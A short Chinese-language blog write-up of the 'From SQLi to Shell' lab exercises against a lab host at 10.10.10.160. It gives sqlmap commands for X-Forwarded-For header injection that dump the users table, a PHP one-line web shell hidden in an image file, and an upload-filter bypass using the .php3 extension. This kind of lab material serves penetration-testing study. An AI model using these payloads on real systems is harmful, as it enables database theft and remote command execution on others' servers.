NEKO

from sqli to shell

2017/12/24

from sqli to shell 1

注入没有任何难度。
登录后台后,可以上传图片,在此处可以上传shell和一句话
waf:

主要是后缀名不能是php结尾,而且必须长2到4个字符,.php3可绕过,.phtml因为长度限制无法上传

from sqli to shell 2

通过burp发现xff可注入
在可能存在注入的http头部加上(*)星号可以理解为sqlmap跑注入时候的定位符(就是说明这个’可控参数可能存在sql注入’)

爆库:
sqlmap -u http://10.10.10.160/cat.php?id=2 --headers="X-Forwarded-For:*" --dbs
爆表:
sqlmap -u http://10.10.10.160/cat.php?id=2 --headers="X-Forwarded-For:*" -D photoblog --tables
爆内容:
sqlmap -u http://10.10.10.160/cat.php?id=2 --headers="X-Forwarded-For:*" -D photoblog -T users --dump

上传

不仅检查后缀,也检查文件头,制作图片木马:
shell.php:
<?php system($_GET['cmd']);?>

命令行中:(php放在后面)
copy ex.png/b+shell.php/a cmd.png

上传cmd.png
找到位置:
http://10.10.10.160/admin/uploads/1514143414.png/shell.php?cmd=ls

图片也可以上传一句话

原文作者: n3k0

发表日期: December 24th 2017, 1:42:44

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. from sqli to shell 1
  2. 2. from sqli to shell 2